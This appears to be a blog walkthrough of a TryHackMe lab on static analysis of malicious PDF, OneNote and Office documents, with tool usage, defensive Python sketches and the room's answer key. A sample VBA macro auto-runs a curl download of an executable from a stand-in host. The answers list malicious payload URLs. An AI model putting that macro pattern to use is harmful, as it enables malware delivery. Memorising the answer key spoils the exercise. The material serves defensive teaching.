In this post, we covered malware analysis techniques and tools for analyzing PDF, OneNote, and Microsoft Office documents. We used lab material from the TryHackMe room MalDoc: Static Analysis and also covered the answers to the room’s task questions, which are part of the SOC Level 2 track.

In the digital era, documents are one of the most frequent methods for sharing information, serving purposes like reports, proposals, and contracts. Due to their widespread use, they have become a common target for cyber attacks. Malicious individuals can exploit documents to spread malware, steal confidential data, or conduct phishing schemes.

As a result, analyzing potentially harmful documents is a crucial aspect of any cybersecurity plan. By examining the structure and content of a document, analysts can detect potential risks and take actions to reduce them. This has become increasingly important as more companies depend on digital documents for storing and sharing sensitive data.

Please watch the video at the bottom of this post for a full, detailed explanation of the walkthrough.

How Are PDF and Office Malware Delivered?

Spearphishing attachments are a common form of cyber attack aimed at specific individuals or organizations through well-crafted, personalized phishing emails. The goal of the attacker is to deceive the recipient into opening a malicious attachment, often containing malware, ransomware, or other harmful software. This allows the attacker to gain unauthorized access to the victim’s system, enabling them to steal sensitive data, compromise systems, or pursue other malicious objectives.

Advanced Persistent Threats (APT) refer to highly organized cybercrime groups or state-sponsored entities that frequently use spearphishing attacks to penetrate their targets’ systems. These APT groups leverage spearphishing attachments as a strategic method to circumvent security defenses and establish access to the target environment.

Malware Families Associated with Malicious Documents

Emotet:

  • Technical details: Emotet is a banking trojan that is often distributed through malicious email attachments, typically in the form of Microsoft Word documents. Once installed, Emotet can steal sensitive information, such as banking credentials and email addresses, and it can also be used to download additional malware.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Emotet, which can be found at https://attack.mitre.org/software/S0367/.

Trickbot:

  • Technical details: Trickbot is a banking trojan that is often distributed through malicious email attachments and is known for its modular design, which allows attackers to add new functionality to the malware as needed. Trickbot has been used to deliver ransomware, exfiltrate data, and perform other types of malicious activity.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for TrickBot, which can be found at https://attack.mitre.org/software/S0266/.

QBot:

  • Technical details: QBot is a banking trojan that is often distributed through malicious email attachments and is known for its ability to steal banking credentials and other sensitive information. QBot is also capable of downloading and executing additional malware and can be used to create backdoors on infected systems.
  • MITRE reference: The MITRE ATT&CK framework tracks QBot under the name QakBot, which can be found at https://attack.mitre.org/software/S0650/.

Dridex:

  • Technical details: Dridex is a banking trojan that is often distributed through malicious email attachments and is known for its ability to steal banking credentials and other sensitive information. Dridex has been active since 2014 and has been one of the most prevalent banking trojans in recent years.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Dridex, which can be found at https://attack.mitre.org/software/S0384/.

Locky:

  • Technical details: Locky is a ransomware family that is often spread through malicious email attachments, typically in the form of Microsoft Word documents. Once installed, Locky encrypts the victim’s files and demands a ransom payment in exchange for the decryption key.
  • MITRE reference: Locky’s file encryption maps to the MITRE ATT&CK technique Data Encrypted for Impact (T1486), which can be found at https://attack.mitre.org/techniques/T1486/.

Zeus:

  • Technical details: Zeus is a banking trojan that has been active since 2007 and is often distributed through malicious email attachments. Zeus is known for its ability to steal banking credentials and other sensitive information and has been used in numerous high-profile attacks over the years.
  • MITRE reference: The MITRE ATT&CK framework includes a reference for Zeus Panda, a banking trojan built on the leaked Zeus source code, which can be found at https://attack.mitre.org/software/S0330/.

Petya:

  • Technical details: Petya is a ransomware family that has been active since 2016 and is often spread through malicious email attachments. Rather than encrypting individual files, Petya encrypts the NTFS Master File Table (MFT) and overwrites the Master Boot Record (MBR), locking the victim out of the entire hard drive and making recovery much more difficult than with other types of ransomware.
  • MITRE reference: The MITRE ATT&CK framework documents NotPetya, the 2017 destructive malware derived from Petya, which can be found at https://attack.mitre.org/software/S0368/.

PDF Document Analysis

A PDF (Portable Document Format) file is made up of a series of objects that are arranged in a defined structure. Gaining an understanding of this structure is crucial when analyzing or working with PDF documents. Below is a brief summary of the key components that make up the structure of a PDF file:

PDF Header: The header is the first line of a PDF file, containing a file signature and version number. The file signature is a specific sequence of characters that designates the file as a PDF, while the version number reflects the version of the PDF specification used to generate the document.

%PDF-1.7
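A quick triage check is to look for the %PDF- signature and read the version that follows it. The minimal Python sketch below does that. The 1024-byte search window is an assumption, reflecting that some PDF readers tolerate bytes in front of the header; for the same reason, a signature that does not start at offset 0 is worth noting during analysis.

```python
import re

# "%PDF-" followed by a major.minor version number, e.g. "%PDF-1.7".
HEADER_RE = re.compile(rb"%PDF-(\d\.\d)")

def pdf_header_version(data: bytes, window: int = 1024):
    """Return the version from the PDF header, or None if no header is found.

    Only the first `window` bytes are searched; the 1024-byte default is an
    assumption mirroring how far some readers look for the header.
    """
    match = HEADER_RE.search(data[:window])
    return match.group(1).decode("ascii") if match else None

def header_at_offset_zero(data: bytes) -> bool:
    """True when the file starts exactly with the PDF signature."""
    return data.startswith(b"%PDF-")

clean = b"%PDF-1.7\n1 0 obj\n"
padded = b"JUNK" + clean  # bytes placed in front of the signature

print(pdf_header_version(clean), header_at_offset_zero(clean))    # 1.7 True
print(pdf_header_version(padded), header_at_offset_zero(padded))  # 1.7 False
```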

PDF Body: The body of a PDF file consists of a series of objects arranged in a defined structure. Each object is marked with an object number and generation number, which serve to uniquely identify it within the document.

1 0 obj
<< /Type /Catalog
/Pages 2 0 R
>>
endobj
2 0 obj
<< /Type /Pages
/Kids [3 0 R 4 0 R]
/Count 2
>>
endobj
3 0 obj
<< /Type /Page
/Parent 2 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
>>
endobj
4 0 obj
<< /Type /Page
/Parent 2 0 R
/MediaBox [0 0 612 792]
/Contents 6 0 R
>>
endobj
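Every object is identified by its object and generation numbers, and other objects point to it with the "N G R" syntax (for example /Pages 2 0 R). The body therefore forms a graph. The Python sketch below recovers that graph from the excerpt above using two regular expressions. It is a simplification that assumes uncompressed, plain-text objects. Objects packed inside compressed object streams (/ObjStm) would not be visible to it.

```python
import re

# "N G obj ... endobj": object number N, generation number G, then the object body.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
# "N G R": an indirect reference to object N, generation G.
REF_RE = re.compile(rb"(\d+)\s+(\d+)\s+R\b")

def object_graph(data: bytes) -> dict:
    """Map each (number, generation) pair to the objects its body references."""
    graph = {}
    for m in OBJ_RE.finditer(data):
        key = (int(m.group(1)), int(m.group(2)))
        graph[key] = [(int(n), int(g)) for n, g in REF_RE.findall(m.group(3))]
    return graph

BODY = b"""1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R 4 0 R] /Count 2 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 5 0 R >>
endobj
4 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 6 0 R >>
endobj
"""

graph = object_graph(BODY)
for key, refs in graph.items():
    print(key, "->", refs)

# References to objects that this excerpt does not define (the page content streams).
defined = set(graph)
dangling = {ref for refs in graph.values() for ref in refs if ref not in defined}
print(sorted(dangling))  # [(5, 0), (6, 0)]
```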

PDF Cross-reference Table: The cross-reference table acts as a map, detailing the locations of all objects within the PDF file. It allows for efficient object retrieval within the document.

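PDF Trailer: The trailer is the final section of a PDF file and points to key parts of the document: the total number of cross-reference entries (/Size), the document catalog (/Root), and, when present, the document information dictionary (/Info) and the encryption settings (/Encrypt). It is followed by the startxref keyword, which gives the byte offset of the cross-reference table.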
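To make the relationship between the trailer, the startxref offset, and the cross-reference table concrete, the Python sketch below writes a tiny PDF, records each object’s byte offset in a classic xref table, and then reads the table back by following startxref. It assumes a single uncompressed xref section with LF line endings. Real files may instead use cross-reference streams (PDF 1.5 and later) or contain several xref sections appended by incremental updates.

```python
import re

def build_minimal_pdf() -> bytes:
    """Assemble a tiny PDF whose xref offsets are computed from the bytes written."""
    objects = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for obj in objects:
        offsets.append(len(out))  # byte offset where "N 0 obj" starts
        out += obj
    xref_pos = len(out)
    size = len(objects) + 1  # entry 0 is the head of the free list
    out += b"xref\n0 %d\n" % size
    out += b"0000000000 65535 f \n"  # every xref entry is exactly 20 bytes
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    # /Size = number of xref entries; /Root = the document catalog.
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % size
    out += b"startxref\n%d\n%%%%EOF\n" % xref_pos
    return bytes(out)

def read_xref(data: bytes) -> dict:
    """Follow the last startxref to a classic xref table; return {object number: offset}."""
    tail = data.rfind(b"startxref")
    xref_pos = int(re.match(rb"startxref\s+(\d+)", data[tail:]).group(1))
    if not data.startswith(b"xref", xref_pos):
        raise ValueError("startxref does not point at a classic xref table")
    lines = data[xref_pos:].split(b"\n")
    first, count = map(int, lines[1].split())
    table = {}
    for i in range(count):
        offset, _generation, kind = lines[2 + i].split()
        if kind == b"n":  # "n" = object in use, "f" = free entry
            table[first + i] = int(offset)
    return table

pdf = build_minimal_pdf()
for number, offset in read_xref(pdf).items():
    # Each in-use entry should land exactly on that object's "N 0 obj" header.
    print(number, offset, pdf[offset:offset + 7])
```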


Tool: pdfid.py

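pdfid.py, a tool by Didier Stevens, scans a PDF and summarizes how many times each keyword of interest (such as obj, stream, /JS, /JavaScript, and /OpenAction) appears in the document.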

In the pdfid.py output, the entries worth noting are:
  1. Objects: This document contains 18 objects.
  2. Stream: This document contains 3 streams that we need to examine.
  3. JS / JavaScript: This document contains 1 JavaScript and 1 JS instance.
  4. /OpenAction: This indicates that an action will be performed when the document is opened, such as running JavaScript or downloading a payload. Therefore, this object is worth examining.
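At its core, pdfid.py counts keyword occurrences. The Python sketch below imitates that idea for a handful of keywords. The keyword list is a hypothetical subset, not pdfid.py’s actual list, and the sample document is made up. The sketch also decodes #xx hex escapes in names, because an attacker can write /JavaScript as /J#61vaScript to slip past naive string searches.

```python
import re

# Delimiters end a PDF name token; "#xx" inside a name is a hex-escaped byte.
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%{}]+")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Hypothetical subset of keywords worth counting during triage.
BARE_KEYWORDS = ["obj", "endobj", "stream", "endstream"]
NAME_KEYWORDS = ["/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"]

def decode_name(token: bytes) -> bytes:
    """Turn an escaped name such as /J#61vaScript into /JavaScript."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), token)

def count_keywords(data: bytes) -> dict:
    counts = {}
    for kw in BARE_KEYWORDS:
        # Whole-word match so "obj" is not also counted inside "endobj".
        pattern = rb"(?<![A-Za-z])" + kw.encode() + rb"(?![A-Za-z])"
        counts[kw] = len(re.findall(pattern, data))
    raw_names = NAME_RE.findall(data)
    names = [decode_name(t) for t in raw_names]
    for kw in NAME_KEYWORDS:
        counts[kw] = names.count(kw.encode())
    # Hex-escaped names are a common way to hide keywords.
    counts["hex-escaped names"] = sum(1 for t in raw_names if HEX_ESCAPE_RE.search(t))
    return counts

SAMPLE = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction 6 0 R >>
endobj
6 0 obj
<< /S /J#61vaScript /JS (app.alert(1);) >>
endobj
"""

for keyword, count in count_keywords(SAMPLE).items():
    print(f"{keyword:<18}{count}")
```

Unlike a plain substring search, this counts the obfuscated /J#61vaScript as /JavaScript, which is the same reason pdfid.py reports obfuscated names.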

Tool: pdf-parser.py

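pdf-parser.py parses a PDF’s objects and lets us search for keywords, select specific objects, and filter (decode) stream contents. Run with only a file name, it prints every object in the document: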

pdf-parser.py simple.pdf
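Many PDF streams, including those that carry embedded JavaScript, are compressed with /FlateDecode, which is zlib compression, so searching the raw file for keywords can miss them. pdf-parser.py can decode such streams for you; the sketch below only illustrates the underlying idea with Python’s standard zlib module. It assumes a single /FlateDecode filter per object and ignores /Length and filter chains, so treat it as a teaching aid rather than a parser.

```python
import re
import zlib

# "stream" keyword (not the tail of "endstream") followed by CRLF or LF.
STREAM_START_RE = re.compile(rb"(?<!end)stream\r?\n")

def inflate_streams(obj_bytes: bytes) -> list:
    """Decompress every stream in an object that declares /FlateDecode."""
    if b"/FlateDecode" not in obj_bytes:
        return []
    decoded = []
    for m in STREAM_START_RE.finditer(obj_bytes):
        # decompressobj stops at the end of the zlib data, so the trailing EOL
        # and "endstream" keyword end up in unused_data instead of raising.
        decoded.append(zlib.decompressobj().decompress(obj_bytes[m.end():]))
    return decoded

script = b"app.alert(1);"
payload = zlib.compress(script)
obj = (b"7 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(payload)
       + payload + b"\nendstream\nendobj\n")

print(inflate_streams(obj))  # [b'app.alert(1);']
```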

We can use the --search option to return only the objects that contain the OpenAction keyword:

pdf-parser.py --search OpenAction simple.pdf

The output shows that object 1 contains the /OpenAction keyword, which references object 6.

To display object 6:

pdf-parser.py --object 6 simple.pdf

The output above shows that object 6 contains the JavaScript code. Taken together, these two results show that when this PDF document is opened, the OpenAction is triggered and the JavaScript code in object 6 is executed.
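The same OpenAction-to-JavaScript chain can be followed programmatically. The Python sketch below indexes objects with a regular expression, finds an /OpenAction that references another object, and reads the /JS literal string from that object. It is a simplified, hypothetical helper. It only handles the indirect-reference form of /OpenAction and JavaScript stored as a literal string; JavaScript held in a (possibly compressed) stream or in a hex string is out of scope.

```python
import re

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
OPEN_ACTION_REF_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")
JS_LITERAL_RE = re.compile(rb"/JS\s*\(")

def read_literal_string(buf: bytes, start: int) -> bytes:
    """Return the raw bytes of the PDF literal string whose '(' is at buf[start]."""
    depth, i = 0, start
    while i < len(buf):
        ch = buf[i:i + 1]
        if ch == b"\\":
            i += 2  # skip the escaped character, e.g. \( or \)
            continue
        if ch == b"(":
            depth += 1  # literal strings may contain balanced parentheses
        elif ch == b")":
            depth -= 1
            if depth == 0:
                return buf[start + 1:i]
        i += 1
    raise ValueError("unterminated literal string")

def open_action_scripts(data: bytes) -> list:
    """Return (source object, action object, JavaScript) for each /OpenAction -> /JS chain."""
    objects = {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(data)}
    results = []
    for number, body in objects.items():
        ref = OPEN_ACTION_REF_RE.search(body)
        if ref is None:
            continue
        target = int(ref.group(1))
        action = objects.get(target, b"")
        js = JS_LITERAL_RE.search(action)
        if js:
            code = read_literal_string(action, js.end() - 1)
            results.append((number, target, code.decode("latin-1")))
    return results

SAMPLE = b"""1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R >>
endobj
6 0 obj
<< /Type /Action /S /JavaScript /JS (app.alert('opened');) >>
endobj
"""

print(open_action_scripts(SAMPLE))  # [(1, 6, "app.alert('opened');")]
```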

Tool: peepdf

Peepdf is a tool designed for PDF analysis, particularly useful for identifying any malicious elements within a document. It also offers an interactive mode that allows users to directly interact with the objects in the PDF. To begin analyzing the document, you can use the command peepdf simple.pdf, which will provide essential information about the PDF file, such as its structure, potential vulnerabilities, and suspicious elements.

Using the interactive mode
The -i flag opens an interactive console from which the document’s objects can be inspected directly:

peepdf -i simple.pdf

JavaScript Analysis

Box-js is a tool designed for analyzing and executing JavaScript code in a secure, controlled environment. Its primary purpose is to examine potentially malicious JavaScript files and observe their behavior without endangering the host system. By creating a sandboxed environment, Box-js allows the JavaScript code to run while being closely monitored, helping to identify malicious actions and understand its functionality.

box-js embedded-code.js

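box-js runs the JavaScript in its sandbox and records what the script tries to do. The IOCs it observes, such as the URLs the script contacts, are written to a results folder; for example, urls.json lists the extracted URLs.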
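For comparison, a purely static pass over the script can already surface plainly written URLs and defang them for reporting. The Python sketch below is such a static alternative, not how box-js works. Its regex misses URLs assembled at runtime (string concatenation, character codes, eval), which is exactly what box-js’s dynamic execution reveals. The sample script and example.com URLs are made up.

```python
import re
from urllib.parse import urlsplit

# Stop at whitespace, quotes, and characters that usually end a URL inside JS source.
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)

def extract_urls(script: str) -> list:
    """Return unique URLs in order of first appearance."""
    return list(dict.fromkeys(URL_RE.findall(script)))

def defang(url: str) -> str:
    """hxxp-style defanging: rewrite the scheme and bracket the dots in the host."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("t", "x")  # http -> hxxp, https -> hxxps
    host = parts.netloc.replace(".", "[.]")
    rest = url.split(parts.netloc, 1)[1]  # path, query and fragment, unchanged
    return f"{scheme}://{host}{rest}"

js = (
    'var a = "http://example.com/slideshow/abc/";'
    'var b = ["https://cdn.example.org/img/1.png", "http://example.com/slideshow/abc/"];'
)

urls = extract_urls(js)
print(len(urls))  # 2
for url in urls:
    print(defang(url))
# hxxp://example[.]com/slideshow/abc/
# hxxps://cdn[.]example[.]org/img/1.png
print([u for u in urls if "slideshow" in u])
```

Only the host is defanged here, which matches the defanged answer format used in the room; other conventions also bracket dots in the path.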

OneNote Document Analysis

OneNote, a widely used note-taking and collaboration tool developed by Microsoft, enables users to create and manage digital notebooks that include various types of content, such as text, images, audio recordings, and file attachments. Notebook sections are saved as .one files, and each notebook’s table of contents is stored in a .onetoc2 file.

onedump.py, a tool by Didier Stevens, parses OneNote documents and can extract the files embedded in them for further analysis.

python3 onedump.py invoice.one
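One way to pull attachments out of a .one file is to search for the GUID that Microsoft’s MS-ONESTORE specification defines as the header of a FileDataStoreObject, which wraps embedded file data. The Python sketch below is not onedump.py’s code. The GUID and the 36-byte header layout (GUID, 64-bit length, 4 unused bytes, 8 reserved bytes) follow my reading of that specification and should be treated as assumptions to verify. The input is a synthetic stand-in, not a real OneNote file.

```python
import struct
import uuid

# FileDataStoreObject header GUID (per MS-ONESTORE), stored little-endian on disk.
FILE_DATA_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
HEADER_SIZE = 16 + 8 + 4 + 8  # GUID, 64-bit length, unused, reserved (assumed layout)

MAGIC = {b"MZ": "PE executable", b"PK\x03\x04": "ZIP/OOXML", b"%PDF": "PDF"}

def carve_embedded_files(data: bytes) -> list:
    """Return the raw bytes of each file found after a FileDataStoreObject header."""
    files = []
    pos = data.find(FILE_DATA_HEADER)
    while pos != -1 and pos + HEADER_SIZE <= len(data):
        (length,) = struct.unpack_from("<Q", data, pos + 16)
        start = pos + HEADER_SIZE
        files.append(data[start:start + length])
        pos = data.find(FILE_DATA_HEADER, start + length)
    return files

def sniff(blob: bytes) -> str:
    """Guess a file type from its leading bytes."""
    for magic, label in MAGIC.items():
        if blob.startswith(magic):
            return label
    return "unknown"

# Synthetic stand-in for a .one file: filler, one header, and an "MZ" payload.
payload = b"MZ\x90\x00fake-executable"
fake_one = (b"\x00" * 64 + FILE_DATA_HEADER + struct.pack("<Q", len(payload))
            + b"\x00" * 12 + payload + b"\x00" * 16)

for blob in carve_embedded_files(fake_one):
    print(len(blob), sniff(blob))  # 19 PE executable
```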

Microsoft Office Document Analysis

Word documents are files created with Microsoft Word, a widely used word processor. They commonly have .doc or .docx extensions and can include text, images, tables, charts, and many other types of content.

There are two main formats for Word documents:

Structured Storage Format
This binary format, also known as OLE2 or the Compound File Binary Format, was used by Microsoft Office 97-2003. Files in this format have extensions such as .doc, .xls, and .ppt.
Office Open XML Format (OOXML)
Introduced in Microsoft Office 2007, this format stores a document as a ZIP archive of XML files and other parts. Changing the extension to .zip lets you unzip the file and browse its contents. Extensions for this format include .docx, .docm (macro-enabled), and others.
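The two formats are easy to tell apart by their first bytes: OLE2 files start with D0 CF 11 E0 A1 B1 1A E1, while OOXML files are ZIP archives starting with PK\x03\x04. In macro-enabled OOXML files, the VBA code lives in a vbaProject.bin part (itself an OLE2 file). The Python sketch below uses only the standard library to identify the container and list any VBA project parts. The in-memory .docm is a minimal, made-up stand-in, not a document Word would open.

```python
import io
import zipfile

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # Structured Storage / Compound File
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML containers are ZIP archives

def office_container(data: bytes) -> str:
    """Classify a file by its leading magic bytes."""
    if data.startswith(OLE2_MAGIC):
        return "OLE2 (.doc/.xls/.ppt)"
    if data.startswith(ZIP_MAGIC):
        return "OOXML (.docx/.docm/...)"
    return "unknown"

def vba_parts(data: bytes) -> list:
    """List the parts of an OOXML file that hold a VBA project."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]

# Build a small in-memory stand-in for a macro-enabled .docm.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("[Content_Types].xml", "<Types/>")
    zf.writestr("word/document.xml", "<w:document/>")
    zf.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 8)
docm = buf.getvalue()

print(office_container(docm))  # OOXML (.docx/.docm/...)
print(vba_parts(docm))          # ['word/vbaProject.bin']
```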

What Makes a Document Malicious

Since documents can embed various elements, these can sometimes be leveraged for harmful purposes. Below are some examples:

  • Macros: Small VBA scripts embedded within Word documents. While designed to automate tasks, they can be misused to run harmful code, potentially installing malware, stealing information, or performing other malicious activities.
  • Embedded Objects: Word documents can include embedded items such as images, audio, video, or other files. These embedded objects could exploit vulnerabilities in the software used to open the document.
  • Links: Malicious Word documents may contain links leading to websites that distribute malware or phishing pages aimed at stealing user credentials.
  • Exploits: Some Word documents can include code that takes advantage of vulnerabilities in the software. These exploits might be used to install malware or gain unauthorized access to sensitive data.
  • Hidden Content: Word documents may also have hidden content not visible to the user, which could execute malicious actions.

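olevba, part of the oletools suite, extracts the VBA macro code it finds in a file and prints a summary of the suspicious elements it detects, such as auto-executing macros, suspicious keywords, and IOCs like URLs. For example:

olevba suspicious.doc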
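To show the kind of reasoning behind olevba’s summary table, the Python sketch below scans VBA source for auto-execution triggers, a few suspicious keywords, and URLs. The keyword lists are illustrative and much shorter than olevba’s actual rules, and the VBA sample is made up.

```python
import re

# Illustrative keyword lists in the spirit of olevba's summary; not olevba's actual rules.
AUTOEXEC = ["AutoOpen", "Document_Open", "Workbook_Open", "AutoExec"]
SUSPICIOUS = ["Shell", "CreateObject", "URLDownloadToFile", "Chr", "CallByName", "Environ"]
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def has_word(code: str, word: str) -> bool:
    """Case-insensitive whole-word search, as VBA keywords are case-insensitive."""
    return re.search(r"\b" + re.escape(word) + r"\b", code, re.IGNORECASE) is not None

def triage_vba(code: str) -> list:
    """Return (type, keyword) findings for a block of VBA source."""
    findings = [("AutoExec", kw) for kw in AUTOEXEC if has_word(code, kw)]
    findings += [("Suspicious", kw) for kw in SUSPICIOUS if has_word(code, kw)]
    findings += [("IOC", url) for url in dict.fromkeys(URL_RE.findall(code))]
    return findings

VBA = '''
Sub AutoOpen()
    Dim target As String
    target = "http://example.com/stage2.exe"
    Shell "cmd /c curl -o %TEMP%\\a.exe " & target
End Sub
'''

for kind, keyword in triage_vba(VBA):
    print(f"{kind:<11}{keyword}")
```

For real documents, olevba can also be driven from Python through oletools’ VBA_Parser class, whose extract_macros() and analyze_macros() methods return the macro code and the flagged keywords.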

Room Answers | TryHackMe MalDoc: Static Analysis

From which family does the Locky malware belong to?
ransomware

What is the Sub-technique ID assigned to Spearphishing Attachment?
T1566.001

What is the flag found inside the JavaScript code?

THM{Luckily_This_Isn't_Harmful}

How many OpenAction objects were found within the document?

1

How many Encoded objects were found in the document?
2

What are the numbers of encoded objects? (Separate with a comma)

15,18

What is the name of the dumped file that contains information about the URLs?

urls.json

How many URLs were extracted from JavaScript?
9

What is the full URL which contains the keyword slideshow? (defang the URL)

hxxp://aristonbentre[.]com/slideshow/01uPzXd2YscA/

What is the value used in the sleep function?

15000

The cURL command is being used to download from a URL and saving the payload in a png file. What is that file name?
index1.png

How many objects are found in the invoice.one document?

6

What is the author name of the document found during the analysis?

CMNatic

How many macros are embedded in the document?

2

What is the URL extracted from the suspicious.doc file?

http://thmredteam.thm/stage2.exe

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
